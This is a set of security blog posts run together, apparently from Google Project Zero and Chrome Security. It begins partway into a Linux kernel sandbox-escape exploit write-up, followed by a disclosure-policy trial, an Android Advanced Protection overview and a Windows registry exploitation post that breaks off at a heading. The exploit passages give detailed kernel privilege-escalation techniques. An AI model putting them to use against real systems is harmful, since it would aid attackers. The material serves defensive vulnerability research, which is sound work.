But as long as only a single userspace memory read needs to be delayed, there is another option: I can create a very large anonymous VMA; fill it with mappings of the 4KiB zeropage; ensure that no page is mapped at one specific location in the VMA (for example with madvise(..., MADV_DONTNEED), which zaps page table entries in the specified range); and then have one thread run an mprotect() operation on this large anonymous VMA while another thread tries to access the part of the userspace region where no page is currently mapped. The mprotect() operation will keep the VMA write-locked while it walks through all the associated page table entries, modifies the page table entries as required, and performs TLB flushes if necessary; so a concurrent page fault in this VMA will have to wait until the mprotect() has finished. One limitation of this technique is that the part of the accessed userspace range that causes the slowdown will be filled with zeroes; but that can just be a single byte at the start or end of the range being copied, so it's not a major limitation.
Based on some rough testing on my machine, if mprotect() has to iterate through 128 MiB of page tables populated with zeropage mappings, it takes something like 500-1000ms depending on which way the page table entries are changed.
Page table control
Putting all this together, I can overwrite the contents of a page table with controlled data. I'm using that controlled write to place a new entry in the page table that points back to the page table, effectively creating a userspace mapping of the page table; and then I can use this to map arbitrary kernel memory writably into userspace.
My exploit demonstrates its ability to modify kernel memory with this by using it to overwrite the UTS information printed by uname.
Takeaway: Chrome sandbox attack surface
One thing that stood out to me about this is that I was able to use a somewhat large number of kernel interfaces in this exploit; in particular:
interface
usecase
anonymous VMA creation
page table allocations
madvise()
fast VMA splitting and merging
AF_UNIXSOCK_STREAM sockets
triggering the bug; SKB allocation and freeing
sched_getcpu() (via syscall-less fastpaths)
interacting with per-cpu kernel structures
eventfd()
synchronization between threads
pipe()
allocation and freeing of order-0 unmovable pages with controlled contents
pipe()
stack overwrite target
AF_UNIXSOCK_DGRAM sockets
placing controlled data on the stack
sendmsg()
placing controlled data on the stack
mprotect()
slowing down copy_from_user()
munmap()
TLB flushing
madvise(..., MADV_DONTNEED)
zapping PTEs for slowing down subsequent copy_from_user() or subsequently detecting copy_from_user()
mincore()
detecting copy_from_user()
clone()
racing operations on multiple threads; reallocating pages as kernel stack
poll()
detecting progress of concurrent pipe_write()
Some of these are obviously needed to implement necessary features of the sandboxed renderer; others seem like unnecessary attack surface. I hope to look at this more systematically in the future.
Takeaway: Esoteric kernel features in core interfaces are an issue for browser sandboxes
One thing I've noticed, not just with this issue, but several issues before that, is that core kernel subsystems (which are exposed in renderer sandbox policies and such) sometimes have flags that trigger esoteric ancillary features that are unintentionally exposed by Chrome's renderer sandbox. Such features seem to often be more buggy than the core feature that the policy intended to expose. Examples of this from Chrome's past include:
memfd_create()was exposed in the sandbox without checking its flags, making it possible to create HugeTLB mappings using the MFD_HUGETLB flag. There have been several bugs in HugeTLB, which is to my knowledge almost exclusively used by some server applications that use large amounts of RAM, such as databases.
pipe2()was exposed in the sandbox without checking its flags, making it possible to create "notification pipes" using the O_NOTIFICATION_PIPE flag, which behave very differently from normal pipes and are used exclusively for posting notifications from the kernel "keys" subsystem to userspace.
Takeaway: probabilistic mitigations against attackers with arbitrary read
When faced with an attacker who already has an arbitrary read primitive, probabilistic mitigations that randomize something differently on every operation can be ineffective if the attacker can keep retrying until the arbitrary read confirms that the randomization picked a suitable value or even work to the attacker's advantage by lining up memory locations that could otherwise never overlap, as done here using the kernel stack randomization feature.
Picking per-syscall random stack offsets at boottime might avoid this issue, since to retry with different offsets, the attacker would have to wait for the machine to reboot or try again on another machine. However, that would break the protection for cases where the attacker wants to line up two syscalls that use the same syscall number (such as different ioctl() calls); and it could also weaken the protection in cases where the attacker just needs to know what the randomization offset for some syscall will be.
Somewhat relatedly, Blindside demonstrated that this style of attack can be pulled off without a normal arbitrary read primitive, by “exploiting” a real kernel memory corruption bug during speculative execution in order to leak information needed for subsequently exploiting the same memory corruption bug for real.
Takeaway: syzkaller fuzzing and complex data structures
The first memory corruption bug described in this post was introduced in late June 2024, and discovered by syzkaller in late August 2024. Hitting that bug required 6 syscalls: One to set up a socket pair, four send()/recv() calls to set up a dangling pointer, and one more recv() call to actually trigger UAF by accessing the dangling pointer.
Hitting the second memory corruption bug, which I found by code review, required 8 syscalls: One to set up a socket pair, six send()/recv() calls to set up a dangling pointer, and one more recv() to cause UAF.
This was not a racy bug; in a KASAN build, running the buggy syscall sequence once would be enough to get a kernel splat. But when a fuzzer chains together syscalls more or less at random, the chance of running the right sequence of syscalls drops exponentially with each syscall required...
The most important takeaway from this is that data structures with complex safety rules (in this case, rules about the ordering of different types of SKBs in the receive queues of UNIX domain stream sockets) don't just make it hard for human programmers to keep track of safety rules, they also make it hard for fuzzers to construct inputs that explore all relevant state patterns. This might be an area for fuzzer improvement - perhaps fuzzers could reach deeper into specific subsystems by generating samples that focus on interaction with a single kernel subsystem, or by monitoring whether additional syscalls chained to the end of a base sample cause additional activity in a particular subsystem.
Takeaway: copy_from_user() delays don't require FUSE or userfaultfd
FUSE and userfaultfd are the most effective and reliable ways to inject delays on copy_from_user() calls because they can set up separate delays for multiple memory regions, provide precise control over the timing of the injected delay, don't require large allocations or slow preparation, and allow placing arbitrary data in the page that is eventually installed. However, applying mprotect() to a large anonymous VMA filled with zeropage mappings (with 128 MiB of page tables) turns out to be sufficient to delay kernel execution by around a second. In the past, I have pushed for restricting userfaultfd because of how it can delay operations like copy_from_user(), but perhaps userfaultfd was not actually significantly more useful in this regard than mprotect().
Takeaway: Usercopy hardening
The hardening checks I encountered when calling copy_to_user() on arbitrary kernel addresses were a major annoyance, but could be worked around, since access to almost anything except type-specific SLUB pages is allowed. That said, I'm not sure how important improving these checks is - trying to protect against an attacker who can pass arbitrary kernel pointers to copy_to_user() might be futile, and guarding against out-of-bounds/use-after-free copy_to_user() or such is the major focus of this hardening.
Conclusions
Even in somewhat constrained environments, it is possible to pull off moderately complex Linux kernel exploits.
Chrome's Linux desktop renderer sandbox exposes kernel attack surface that is never legitimately used in the sandbox. This needless functionality doesn’t just allow attackers to exercise vulnerabilities they otherwise couldn’t; it also exposes kernel interfaces that are useful for exploitation, enabling heap grooming, delay injection and more. The Linux kernel contributes to this issue by exposing esoteric features through the same syscalls as commonly-used core kernel functionality. I hope to do a more in-depth analysis of Chrome's renderer sandbox on Linux in a follow-up blogpost.
In 2021, we updated our vulnerability disclosure policy to the current "90+30" model. Our goals were to drive faster yet thorough patch development, and improve patch adoption. While we’ve seen progress, a significant challenge remains: the time it takes for a fix to actually reach an end-user's device.
This delay, often called the "patch gap," is a complex problem. Many consider the patch gap to be the time between a fix being released for a security vulnerability and the user installing the relevant update.However, our work has highlighted a critical, earlier delay: the "upstream patch gap". This is the period where an upstream vendor has a fix available, but downstream dependents, who are ultimately responsible for shipping fixes to users, haven’t yet integrated it into their end product.
As Project Zero's recent work has focused on foundational, upstream technologies like chipsets and their drivers, we've observed that this upstream gap significantly extends the vulnerability lifecycle.
For the end user, a vulnerability isn't fixed when a patch is released from Vendor A to Vendor B; it's only fixed when they download the update and install it on their device. To shorten that entire chain, we need to address the upstream delay.
To address this, we're announcing a new trial policy: Reporting Transparency.
The Trial: Reporting Transparency
Our core 90-day disclosure deadline will remain in effect. However, we're adding a new step at the beginning of the process.
Beginning today, within approximately one week of reporting a vulnerability to a vendor, we will publicly share that a vulnerability was discovered. We will share:
The vendor or open-source project that received the report.
The affected product.
The date the report was filed, and when the 90-day disclosure deadline expires.
This trial maintains our existing 90+30 policy, meaning vendors still have 90 days to fix a bug before it is disclosed, with a 30-day period for patch adoption if the bug is fixed before the deadline.
Google Big Sleep, a collaboration between Google DeepMind and Google Project Zero, will also be trialling this policy for their vulnerability reports. The issue tracker for Google Big Sleep is at goo.gle/bigsleep
Why the Change? Increased Transparency to Close the Gap
The primary goal of this trial is to shrink the upstream patch gap by increasing transparency. By providing an early signal that a vulnerability has been reported upstream, we can better inform downstream dependents. For our small set of issues, they will have an additional source of information to monitor for issues that may affect their users.
We hope that this trial will encourage the creation of stronger communication channels between upstream vendors and downstream dependents relating to security, leading to faster patches and improved patch adoption for end users.
This data will make it easier for researchers and the public to track how long it takes for a fix to travel from the initial report, all the way to a user's device (which is especially important if the fix never arrives!)
Will this help attackers?
No — we anticipate that in the initial phase of this trial, there may be increased public attention on unfixed bugs. We want to be clear: no technical details, proof-of-concept code, or information that we believe would materially assist discovery will be released until the deadline. Reporting Transparency is an alert, not a blueprint for attackers.
We understand that for some vendors without a downstream ecosystem, this policy may create unwelcome noise and attention for vulnerabilities that only they can address. However, these vendors now represent the minority of vulnerabilities reported by Project Zero. We believe the benefits of a fair, simple, consistent and transparent policy outweigh the risk of inconvenience to a small number of vendors.
That said, in 2025, we hope that the industry consensus is that the mere existence of vulnerabilities in software is neither surprising nor alarming. End users are more aware of the importance of security updates than ever before. It's widely accepted as fact that any system of moderate complexity will have vulnerabilities, and systems that were considered impenetrable in the past have been shown to be vulnerable in retrospect.
This is a trial, and we will be closely monitoring its effects. We hope it achieves our ultimate goal: a safer ecosystem where vulnerabilities are remediated not just in an upstream code repository, but on the devices, systems and services that people use every day. We look forward to sharing our findings and continuing to evolve our policies to meet the challenges of the ever-changing security landscape.
Posted by David Adrian, Javier Castro & Peter Kotwicz, Chrome Security Team
Android recently announced Advanced Protection, which extends Google’s Advanced Protection Program to a device-level security setting for Android users that need heightened security—such as journalists, elected officials, and public figures. Advanced Protection gives you the ability to activate Google’s strongest security for mobile devices, providing greater peace of mind that you’re better protected against the most sophisticated threats.
Advanced Protection acts as a single control point for at-risk users on Android that enables important security settings across applications, including many of your favorite Google apps, including Chrome. In this post, we’d like to do a deep dive into the Chrome features that are integrated with Advanced Protection, and how enterprises and users outside of Advanced Protection can leverage them.
Android Advanced Protection integrates with Chrome on Android in three main ways:
Enables the “Always Use Secure Connections” setting for both public and private sites, so that users are protected from attackers reading confidential data or injecting malicious content into insecure plaintext HTTP connections. Insecure HTTP represents less than 1% of page loads for Chrome on Android.
Enables full Site Isolation on mobile deviceswith 4GB+ RAM, so that potentially malicious sites are never loaded in the same process as legitimate websites. Desktop Chrome clients already have full Site Isolation.
Reduces attack surface by disabling Javascript optimizations, so that Chrome has a smaller attack surface and is harder to exploit.
Let’s take a look at all three, learn what they do, and how they can be controlled outside of Advanced Protection.
Always Use Secure Connections
“Always Use Secure Connections” (also known as HTTPS-First Mode in blog posts and HTTPS-Only Mode in the enterprise policy) is a Chrome setting that forces HTTPS wherever possible, and asks for explicit permission from you before connecting to a site insecurely. There may be attackers attempting to interpose on connections on any network, whether that network is a coffee shop, airport, or an Internet backbone. This setting protects users from these attackers reading confidential data and injecting malicious content into otherwise innocuous webpages. This is particularly useful for Advanced Protection users, since in 2023, plaintext HTTP was used as an exploitation vector during the Egyptian election.
Beyond Advanced Protection, we previously posted about how our goal is to eventually enable “Always Use Secure Connections” by default for all Chrome users. As we work towards this goal, in the last two years we have quietly been enabling it in more places beyond Advanced Protection, to help protect more users in risky situations, while limiting the number of warnings users might click through:
We added a new variant of the setting that only warns on public sites, and doesn’t warn on local networks or single-label hostnames (e.g. 192.168.0.1, shortlink/, 10.0.0.1). These names often cannot be issued a publicly-trusted HTTPS certificate. This variant protects against most threats—accessing a public website insecurely—but still allows for users to access local sites, which may be on a more trusted network, without seeing a warning.
We’ve automatically enabled “Always Use Secure Connections” for public sites in Incognito Mode for the last year, since Chrome 127 in June 2024.
We automatically prevent downgrades from HTTPS to plaintext HTTP on sites that Chrome knows you typically access over HTTPS (a heuristic version of the HSTS header), since Chrome 133 in January 2025.
Always Use Secure Connections has two modes—warn on insecure public sites, and warn on any insecure site.
Any user can enable “Always Use Secure Connections” in the Chrome Privacy and Security settings, regardless of if they’re using Advanced Protection. Users can choose if they would like to warn on any insecure site, or only insecure public sites. Enterprises can opt their fleet into either mode, and set exceptions using the HTTPSOnlyMode and HTTPAllowlist policies, respectively. Website operators should protect their users' confidentiality, ensure their content is delivered exactly as they intended, and avoid warnings, by deploying HTTPS.
Full Site Isolation
Site Isolation is a security feature in Chrome that isolates each website into its own rendering OS process. This means that different websites, even if loaded in a single tab of the same browser window, are kept completely separate from each other in memory. This isolation prevents a malicious website from accessing data or code from another website, even if that malicious website manages to exploit a vulnerability in Chrome’s renderer—a second bug to escape the renderer sandbox is required to access other sites. Site isolation improves security, but requires extra memory to have one process per site. Chrome Desktop isolates all sites by default. However, Android is particularly sensitive to memory usage, so for mobile Android form factors, when Advanced Protection is off, Chrome will only isolate a site if a user logs into that site, or if the user submits a form on that site. On Android devices with 4GB+ RAM in Advanced Protection (and on all desktop clients), Chrome will isolate all sites. Full Site Isolation significantly reduces the risk of cross-site data leakage for Advanced Protection users.
JavaScript Optimizations and Security
Advanced Protection reduces the attack surface of Chrome by disabling the higher-level optimizing Javascript compilers inside V8. V8 is Chrome’s high-performance Javascript and WebAssembly engine. The optimizing compilers in V8 make certain websites run faster, however they historically also have been a source of known exploitation of Chrome. Of all the patched security bugs in V8 with known exploitation, disabling the optimizers would have mitigated ~50%. However, the optimizers are why Chrome scores the highest on industry-wide benchmarks such as Speedometer. Disabling the optimizers blocks a large class of exploits, at the cost of causing performance issues for some websites.
Javascript optimizers can be disabled outside of Advanced Protection Mode via the “Javascript optimization & security” Site Setting. The Site Setting also enables users to disable/enable Javascript optimizers on a per-site basis. Disabling these optimizing compilers is not limited to Advanced Protection. Since Chrome 133, we’ve exposed this as a Site Setting that allows users to enable or disable the higher-level optimizing compilers on a per-site basis, as well as change the default.
Settings -> Privacy and Security -> Javascript optimization and security
This setting can be controlled by the DefaultJavaScriptOptimizerSetting enterprise policy, alongside JavaScriptOptimizerAllowedForSites and JavaScriptOptimizerBlockedForSites for managing the allowlist and denylist. Enterprises can use this policy to block access to the optimizer, while still allowlisting1 the SaaS vendors their employees use on a daily basis. It’s available on Android and desktop platforms
Chrome aims for the default configuration to be secure for all its users, and we’re continuing to raise the bar for V8 security in the default configuration by rolling out the V8 sandbox.
Protecting All Users
Billions of people use Chrome and Android, and not all of them have the same risk profile. Less sophisticated attacks by commodity malware can be very lucrative for attackers when done at scale, but so can sophisticated attacks on targeted users. This means that we cannot expect the security tradeoffs we make for the default configuration of Chrome to be suitable for everyone.
Advanced Protection, and the security settings associated with it, are a way for users with varying risk profiles to tailor Chrome to their security needs, either as an individual at-risk user. Enterprises with a fleet of managed Chrome installations can also enable the underlying settings now. Advanced Protection is available on Android 16 in Chrome 137+.
We additionally recommend at-risk users join the Advanced Protection Program with their Google accounts, which will require the account to use phishing-resistant multi-factor authentication methods and enable Advanced Protection on any of the user’s Android devices. We also recommend users enable automatic updates and always keep their Android phones and web browsers up to date.
Notes
Allowlisting only works on platforms capable of full site isolation—any desktop platform and Android devices with 2GB+ RAM. This is because internally allowlisting is dependent on origin isolation. ↩
In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory.This is a class of issues characteristic of the Windows registry, but universal enough that the techniques described here are applicable to 17 of my past vulnerabilities, as well as likely any similar bugs in the future. As we know, hives exhibit a very special behavior in terms of low-level memory management (how and where they are mapped in memory), handling of allocatedand freed memory chunks by a custom allocator, and the nature of data stored there.All this makes exploiting this type of vulnerability especially interesting from the offensive security perspective, which is why I would like to describe it here in detail.
Similar to any other type of memory corruption, the vast majority of hive memory corruption issues can be classified into two groups: spatial violations (such as buffer overflows):
and temporal violations, such as use-after-free conditions:
In this write up, we will aim to select the most promising vulnerability candidate and then create a step-by-step exploit for it that will elevate the privileges of a regular user in the system, from Medium IL to system-level privileges. Our target will be Windows 11, and an additional requirement will be to successfully bypass all modern security mitigations. I have previously presented on this topic at OffensiveCon 2024 with a presentation titled "Practical Exploitation of Registry Vulnerabilities in the Windows Kernel", and this blog post can be considered a supplement and expansion of the information shown there. Those deeply interested in the subject are encouraged to review the slides and recording available from that presentation.
Where to start: high-level overview of potential options
Let's start with a recap of some key points.As you may recall, the Windows registry cell allocator (i.e., the internal HvAllocateCell, HvReallocateCell, and HvFreeCell functions) operates in a way that is very favorable for exploitation.Firstly, it completely lacks any safeguards against memory corruption, and secondly, it has no element of randomness, making its behavior entirely predictable.Consequently, there is no need to employ any "hive spraying" or other similar techniques known from typical heap exploitation – if we manage to achieve the desired cell layout on a test machine, it will be reproducible on other computers without any additional steps.A potential exception could be carrying out attacks on global, shared hives within HKLM and HKU, as we don't know their initial state, and some randomness may arise from operations performed concurrently by other applications.Nevertheless, even this shouldn't pose a particularly significant challenge.We can safely assume that arranging the memory layout of a hive is straightforward, and if we have some memory corruption capability within it, we will eventually be able to overwrite any type of cell given some patience and experimentation.
The exploitation of classic memory corruption bugs typically involves the following steps:
Initial memory corruption primitive
???
???
???
Profit (in the form of arbitrary code execution, privilege escalation, etc.)
The task of the exploit developer is to fill in the gaps in this list, devising the intermediate steps leading to the desired goal. There are usually several such intermediate steps because, given the current state of security and mitigations, vulnerabilities rarely lead directly from memory corruption to code execution in a single step. Instead, a strategy of progressively developing stronger and stronger primitives is employed, where the final chain might look like this, for instance:
In this model, the second/third steps are achieved by finding another interesting object, arranging for it to be allocated near the overwritten buffer, and then corrupting it in such a way as to create a new primitive.However, in the case of hives, our options in this regard seem limited: we assume that we can fully control the representation of any cell in the hive, but the problem is that there is no immediately interesting data in them from an exploitation point of view.For example, the regf format does not contain any data that directly influences control flow (e.g., function pointers), nor any other addresses in virtual memory that could be overwritten in some clever way to improve the original primitive.The diagram below depicts our current situation:
Does this mean that hive memory corruption is non-exploitable, and the only thing it allows for is data corruption in an isolated hive memory view? Not quite.In the following subsections, we will carefully consider various ideas of how taking control of the internal hive data can have a broader impact on the overall security of the system.Then, we will try to determine which of the available approaches is best suited for use in a real-world exploit.
Intra-hive corruption
Let's start by investigating whether overwriting internal hive data is as impractical as it might initially seem.
Performing hive-only attacks in privileged system hives
To be clear, it's not completely accurate to say that hives don't contain any data worth overwriting.If you think about it, it's quite the opposite – the registry stores a vast amount of system configuration, information about registered services, user passwords, and so on.The only issue is that all this critical data is located in specific hives, namely those mounted under HKEY_LOCAL_MACHINE, and some in HKEY_USERS (e.g., HKU\.Default, which corresponds to the private hive of the System user).To be able to perform a successful attack and elevate privileges by corrupting only regf format data (without accessing other kernel memory or achieving arbitrary code execution), two conditions must be met:
The vulnerability must be triggerable solely through API/system calls and must not require binary control over the hive, as we obviously don't have that over any system hive.
The target hive must contain at least one key with permissive enough access rights that allow unprivileged users to create values (KEY_SET_VALUE permission) and/or new subkeys (KEY_CREATE_SUB_KEY). Some other access rights might also be necessary, depending on the prerequisites of the specific bug.
Of the two points above, the first is definitely more difficult to satisfy.Many hive memory corruption bugs result from a strange, unforeseen state in the hive structures that can only be generated "offline", starting with full control over the given file.API-only vulnerabilities seem to be relatively rare: for instance, of my 17 hive-based memory corruption cases, less than half (specifically 8 of them) could theoretically be triggered solely by operations on an existing hive. Furthermore, a closer look reveals that some of them do not meet other conditions needed to target system hives (e.g., they only affect differencing hives), or are highly impractical, e.g., require the allocation of more than 500 GB of memory, or take many hours to trigger.In reality, out of the wide range of vulnerabilities, there are really only two that would be well suited for directly attacking a system hive: CVE-2023-23420 (discussed in the "Operating on subkeys of transactionally renamed keys" section of the report) and CVE-2023-23423 (discussed in "Freeing a shallow copy of a key node with CmpFreeKeyByCell").
Regarding the second issue – the availability of writable keys – the situation is much better for the attacker.There are three reasons for this:
To successfully carry out a data-only attack on a system key, we are usually not limited to one specific hive, but can choose any that suits us.Exploiting hive corruption in most, if not all, hives mounted under HKLM would enable an attacker to elevate privileges.
The Windows kernel internally implements the key opening process by first doing a full path lookup in the registry tree, and only then checking the required user permissions. The access check is performed solely on the security descriptor of the specific key, without considering its ancestors. This means that setting overly permissive security settings for a key automatically makes it vulnerable to attacks, as according to this logic, it receives no additional protection from its ancestor keys, even if they have much stricter access controls.
There are a large number of user-writable keys in the HKLM\SOFTWARE and HKLM\SYSTEM hives.They do not exist in HKLM\BCD00000000, HKLM\SAM, or HKLM\SECURITY, but as I mentioned above, only one such key is sufficient for successful exploitation.
To find specific examples of such publicly accessible keys, it is necessary to write custom tooling. This tooling should first recursively list all existing keys within the low-level \Registry\Machine and \Registry\User paths, while operating with the highest possible privileges, ideally as the System user. This will ensure that the process can see all the keys in the registry tree – even those hidden behind restricted parents. It is not worth trying to enumerate the subkeys of \Registry\A, as any references to it are unconditionally blocked by the Windows kernel. Similarly, \Registry\WC can likely be skipped unless one is interested in attacking differencing hives used by containerized applications. Once we have a complete list of all the keys, the next step is to verify which of them are writable by unprivileged users. This can be accomplished either by reading their security descriptors (using RegGetKeySecurity) and manually checking their access rights (using AccessCheck), or by delegating this task entirely to the kernel and simply trying to open every key with the desired rights while operating with regular user privileges. In either case, we should be ultimately able to obtain a list of potential keys that can be used to corrupt a system hive.
Based on my testing, there are approximately 1678 keys within HKLM that grant subkey creation rights to normal users on a current Windows 11 system.Out of these, 1660 are located in HKLM\SOFTWARE, and 18 are in HKLM\SYSTEM.Some examples include:
As we can see, there are quite a few possibilities. The second key on the list, HKLM\SOFTWARE\Microsoft\DRM, has been somewhat popular in the past, as it was previously used by James Forshaw to demonstrate two vulnerabilities he discovered in 2019–2020 (CVE-2019-0881, CVE-2020-1377). Subsequently, I also used it as a way to trigger certain behaviors related to registry virtualization (CVE-2023-21675, CVE-2023-21748, CVE-2023-35357), and as a potential avenue to fill the SOFTWARE hive to its capacity, thereby causing an OOM condition as part of exploiting another bug (CVE-2023-32019). The main advantage of this key is that it exists in all modern versions of the system (since at least Windows 7), and it grants broad rights to all users (the Everyone group, also known as World, or S-1-1-0). The other keys mentioned above also allow regular users write operations, but they often do so through other, potentially more restricted groups such as Interactive (S-1-5-4), Users (S-1-5-32-545), or Authenticated Users (S-1-5-11), which may be something to keep in mind.
Apart from global system hives, I also discovered the curious case of the HKCU\Software\Microsoft\Input\TypingInsights key being present in every user's hive, which permits read and write access to all other users in the system.I reported it to Microsoft in December 2023 (link to report), but it was deemed low severity and hasn't been fixed so far.This decision is somewhat understandable, as the behavior doesn't have direct, serious consequences for system security, but it still can work as a useful exploitation technique. Since any user can open a key for writing in the user hive of any other user, they gain the ability to:
Fill the entire 2 GiB space of that hive, resulting in a DoS condition (the user and their applications cannot write to HKCU) and potentially enabling exploitation of bugs related to mishandling OOM conditions within the hive.
Write not just to the "TypingInsights" key in the HKCU itself, but also to any of the corresponding keys in the differencing hives overlaid on top of it.This provides an opportunity to attack applications running within app/server silos with that user's permissions.
Perform hive-based memory corruption attacks not only on system hives, but also on the hives of specific users, allowing for a more lateral privilege escalation scenario.
As demonstrated, even a seemingly minor weakness in the security descriptor of a single registry key can have significant consequences for system security.
In summary, attacking system hives with hive memory corruption is certainly possible, but requires finding a very good vulnerability that can be triggered on existing keys, without the need to load a custom hive.This is a good starting point, but perhaps we can find a more universal technique.
Abusing regf inconsistency to trigger kernel pool corruption
While hive mappings in memory are isolated and self-contained to some extent, they do not exist in a vacuum.The Windows kernel allocates and manages many additional registry-related objects within the kernel pool space, as discussed in blog post #6.These objects serve as optimization through data caching, and help implement certain functionalities that cannot be achieved solely through operations on the hive space (e.g., transactions, layered keys).Some of these objects are long-lived and persist in memory as long as the hive is mounted.Other buffers are allocated and immediately freed within the same syscall, serving only as temporary data storage. The memory safety of all these objects is closely tied to the consistency of the corresponding data within the hive mapping.After the kernel meticulously verifies the hive validity in CmCheckRegistry and related functions, it assumes that the registry hive's data maintains consistency with its own structure and associated auxiliary structures.
For a potential attacker, this means that hive memory corruption can be potentially escalated to some forms of pool corruption. This provides a much broader spectrum of options for exploitation, as there are a variety of pool allocations used by various parts of the kernel.In fact, I even took advantage of this behavior in my reports to Microsoft: in every case of a use-after-free on a security descriptor, I would enable Special Pool and trigger a reference to the cached copy of that descriptor on the pools through the _CM_KEY_CONTROL_BLOCK.CachedSecurity field.I did this because it is much easier to generate a reliably reproducible crash by accessing a freed allocation on the pool than when accessing a freed but still mapped cell in the hive.
However, this is certainly not the only way to cause pool memory corruption by modifying the internal data of the regf format.Another idea would be, for example, to create a very long "big data" value in the hive (over ~16 KiB in a hive with version ≥ 1.4) and then cause _CM_KEY_VALUE.DataLength to be inconsistent with the _CM_BIG_DATA.Count field, which denotes the number of 16-kilobyte chunks in the backing buffer.If we look at the implementation of the internal CmpGetValueData function, it is easy to see that it allocates a paged pool buffer based on the former value, and then copies data to it based on the latter one.Therefore, if we set _CM_KEY_VALUE.DataLength to a number less than 16344 × (_CM_BIG_DATA.Count - 1), then the next time the value's data is requested, a linear pool buffer overflow will occur.
This type of primitive is promising, as it opens the door to targeting a much wider range of objects in memory than was previously possible.The next step would likely involve finding a suitable object to place immediately after the overwritten buffer (e.g., pipe attributes, as mentioned in this article from 2020), and then corrupting it to achieve a more powerful primitive like arbitrary kernel read/write.In short, such an attack would boil down to a fairly generic exploitation of pool-based memory corruption, a topic widely discussed in existing resources. We won't explore this further here, and instead encourage interested readers to investigate it on their own.
Inter-hive memory corruption
So far in our analysis, we have assumed that with a hive-based memory corruption bug, we can only modify data within the specific hive we are operating on.In practice, however, this is not necessarily the case, because there might be other data located in the immediate vicinity of our bin's mapping in memory. If that happens, it might be possible to seamlessly cross the boundary between the original hive and some more interesting objects at higher memory addresses using a linear buffer overflow.In the following sections, we will look at two such scenarios: one where the mapping of the attacked hiveis in the user-mode space of the "Registry" process, and one where it resides in the kernel address space.
Other hive mappings in the user space of the Registry process
Mapping the section views of hives in the user space of the Registry process is the default behavior for the vast majority of the registry.The layout of individual mappings in memory can be easily observed from WinDbg.To do this, find the Registry process (usually the second in the system process list), switch to its context, and then issue the !vad command.An example of performing these operations is shown below.
In the listing above, the "Start" and "End" columns show the starting and ending addresses of each mapping divided by the page size, which is 4 KiB. In practice, this means that the SAM hive is mapped at 0x152e7a20000 – 0x152e7a2ffff, the DEFAULT hive is mapped at 0x152e7a30000 – 0x152e7b2ffff, and so on.We can immediately see that all the hives are located very close to each other, with practically no gaps in between them.
However, this example does not directly demonstrate whether it's possible to place, for instance, the mapping of the SOFTWARE hive directly after the mapping of an app hive loaded by a normal user.The addresses of the system hives appear to be already determined, and there isn't much space between them to inject our own data.Fortunately, hives can grow dynamically, especially when you start writing long values to them.This leads to the creation of new bins and mapping them at new addresses in the Registry process's memory.
For testing purposes, I wrote a simple program that creates consecutive values of 0x3FD8 bytes within a given key.This triggers the allocation of new bins of exactly 0x4000 bytes: 0x3FD8 bytes of data plus 0x20 bytes for the _HBIN structure, 4 bytes for the cell size, and 4 bytes for padding. Next, I ran two instances of it in parallel on an app hive and HKLM\SOFTWARE, filling the former with the letter "A" and the latter with the letter "B". The result of the test was immediately visible in the memory layout:
What we have here are interleaved mappings of trusted and untrusted hives, each 2 MiB in length and tightly packed with 512 bins of 16 KiB each.Importantly, there are no gaps between the end of one mapping and the start of another, which means that it is indeed possible to use memory corruption within one hive to influence the internal representation of another.Take, for example, the boundary between the test.dat and SOFTWARE hives at address 0x15280400000.If we dump the memory area encompassing a few dozen bytes before and after this page boundary, we get the following result:
We can clearly see that the bytes belonging to both hives in question exist within a single, continuous memory area.This, in turn, means that memory corruption could indeed spread from one hive into the other.However, to successfully achieve this result, one would also need to ensure that the specific fragment of the target hive is marked as dirty.Otherwise, this memory page would be marked as PAGE_READONLY, which would lead to a system crash when attempting to write data, despite both regions being directly adjacent to each other.
After successfully corrupting data in a global, system hive, the remainder of the attack would likely involve either modifying a security descriptor to grant oneself write permissions to specific keys, or directly changing configuration data to enable the execution of one's own code with administrator privileges.
Attacking adjacent memory in pool-based hive mappings
Although hive file views are typically mapped in the user-mode space of the Registry process (which contains nothing else but these mappings), there are a few circumstances where this data is stored directly in kernel-mode pools.These cases are as follows:
All volatile hives, which have no persistent representation as regf files on disk.Examples include the virtual hive rooted at \Registry, as well as the HKLM\HARDWARE hive.
The entire HKLM\SYSTEM hive, including both its stable and volatile parts.
All hives that have been recently created by calling one of the NtLoadKey* syscalls on a previously non-existent file, including newly created app hives.
Volatile storage space of every active hive in the system.
The first point is not useful to a potential attacker because these types of hives do not grant unprivileged users write permissions.The second and third points are also quite limited, as they could only be exploited through memory corruption that doesn't require binary control over the input hive.However, the fourth point makes it possible to exploit vulnerabilities in any hive in the system, including app hives.This is because creating volatile keys does not require any special permissions compared to regular keys.Additionally, if we have a memory corruption primitive within one storage type, we can easily influence data within the other.For example, in the case of stable storage memory corruption, it is enough to craft a value for which the cell index _CM_KEY_VALUE.Data has the highest bit set, and thus points to the volatile space.From this point, we can arbitrarily modify regf structures located in that space, and directly read/write out-of-bounds pool memory by setting a sufficiently long value size (exceeding the bounds of the given bin). Such a situation is shown in the diagram below:
This behavior can be further verified on a specific example.Let's consider the HKCU hive for a user logged into a Windows 11 system – it will typically have some data stored in the volatile storage due to the existence of the "HKCU\Volatile Environment" key. Let's first find the hive in WinDbg using the !reg hivelist command:
As can be seen, the hive has a volatile space of 0x5000 bytes (5 memory pages).Let's try to find the second page of this hive region in memory by translating its corresponding cell index:
Everything looks good.At the start of the page, there is a bin header, and at offset 0x20, we see the first cell corresponding to a security descriptor ('sk').Now, let's see what the !pool command tells us about this address:
The next two memory pages correspond to other, completely unrelated allocations on the pool: one associated with the NT Object Manager, and the other with the win32k.sys graphics driver. This clearly demonstrates that in the kernel space, areas containing volatile hive data are mixed with various other allocations used by other parts of the system. Moreover, this technique is attractive because it not only enables out-of-bound writes of controlled data, but also the ability to read this OOB data beforehand. Thanks to this, the exploit does not have to operate "blindly", but it can precisely verify whether the memory is arranged exactly as expected before proceeding with the next stage of the attack. With these kinds of capabilities, writing the rest of the exploit should be a matter of properly grooming the pool layout and finding some good candidate objects for corruption.
The ultimate primitive: out-of-bounds cell indexes
